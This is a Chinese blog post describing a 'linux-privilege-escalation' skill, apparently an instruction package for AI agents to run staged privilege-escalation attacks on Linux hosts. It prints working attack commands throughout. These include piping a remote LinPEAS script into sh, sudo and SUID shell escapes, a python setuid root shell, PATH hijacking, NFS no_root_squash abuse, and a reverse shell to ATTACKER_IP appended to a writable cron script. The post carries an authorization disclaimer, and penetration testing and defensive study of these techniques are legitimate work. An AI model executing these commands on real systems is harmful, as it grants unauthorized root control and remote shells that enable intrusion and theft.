【计算机工具类-操作系统Skills】linux-privilege-escalation 技能

📅 2026/8/2 12:11:24 👁️ 阅读次数 📝 编程学习
【计算机工具类-操作系统Skills】linux-privilege-escalation 技能

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.

技能概述

linux-privilege-escalation 技能在Linux系统上执行系统化权限提升评估,识别和利用错误配置、易受攻击的服务和安全弱点,从而实现从低权限用户访问到root级别控制的提升。

下载地址:https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation

授权使用声明:此技能仅用于授权的安全评估、防御性验证或受控的教育环境。

输入/前置条件

  • 目标Linux系统的低权限shell访问
  • 执行命令的能力(交互式或半交互式shell)
  • 反向shell连接的网络访问(如需要)
  • 攻击者机器用于托管payload和接收shell

输出/交付物

  • 目标系统上的root shell访问
  • 权限提升路径文档
  • 系统枚举发现报告
  • 修复建议

核心工作流程

阶段1: 系统枚举

# 主机名和系统角色
hostname

# 内核版本和架构
uname -a

# 详细内核信息
cat /proc/version

# 操作系统详情
cat /etc/issue
cat /etc/*-release

阶段2: 自动化枚举

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

阶段3: 内核漏洞利用

识别内核版本并搜索漏洞:

uname -r
cat /proc/version

# 使用Linux Exploit Suggester
./linux-exploit-suggester.sh

# 手动搜索
searchsploit linux kernel [version]

阶段4: Sudo利用

# 枚举sudo权限
sudo -l

# GTFOBins sudo利用示例
sudo vim -c ':!/bin/bash'
sudo find . -exec /bin/sh \; -quit
sudo awk 'BEGIN {system("/bin/bash")}'

阶段5: SUID二进制文件利用

# 查找SUID二进制文件
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# 利用SUID二进制文件(参考GTFOBins)

阶段6: Capabilities利用

# 枚举capabilities
getcap -r / 2>/dev/null

# 利用示例
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

阶段7: Cron作业利用

# 枚举cron作业
cat /etc/crontab
ls -la /var/spool/cron/crontabs/
ls -la /etc/cron.*

# 利用可写cron脚本
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

阶段8: PATH劫持

# 查找调用外部命令的SUID二进制文件
strings /usr/local/bin/suid-binary

# 通过在可写PATH中创建恶意二进制文件进行劫持
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service

阶段9: NFS利用

# 查找no_root_squash选项
cat /etc/exports

# 挂载共享并创建SUID二进制文件
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs

快速参考

  • 内核版本:uname -a
  • 当前用户:id
  • Sudo权限:sudo -l
  • SUID文件:find / -perm -u=s -type f 2>/dev/null
  • Capabilities:getcap -r / 2>/dev/null
  • Cron作业:cat /etc/crontab
  • 可写目录:find / -writable -type d 2>/dev/null
  • NFS导出:cat /etc/exports

关键资源

  • GTFOBins: GTFOBins
  • LinPEAS: https://github.com/carlospolop/PEASS-ng
  • Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

约束和限制

  • 在生产环境使用前,在测试环境中验证内核漏洞
  • 失败的内核漏洞可能导致系统崩溃
  • 记录权限提升期间的所有更改
  • 仅在授权时维护访问持久性

局限性

  • 仅在任务明确匹配上述范围时使用此技能
  • 不要将输出视为环境特定验证、测试或专家审查的替代品
  • 如果缺少必需的输入、权限、安全边界或成功标准,请停止并请求澄清